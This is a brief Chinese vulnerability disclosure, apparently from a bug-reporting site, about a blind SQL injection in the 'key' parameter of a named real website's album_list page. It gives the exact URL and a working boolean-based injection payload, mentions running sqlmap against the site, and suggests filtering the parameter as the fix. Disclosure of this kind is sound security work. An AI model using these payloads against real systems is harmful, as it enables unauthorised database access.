存在注入站点:
http://vshare.wo.com.cn/
注入点:http://vshare.wo.com.cn/album_list?key=1
注入参数key=1
http://vshare.wo.com.cn/album_list?key=1'
返回空白页面。
http://vshare.wo.com.cn/album_list?key=1%' and 1=1 and '%'='
返回正常。
SQLMAP能跑,不手工了,上一个手工累死人了。
注了没多久,竟然超时了。。。
盲注,所以速度很慢。
到这里为止吧。能证明就好
修复方案:
过滤key
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;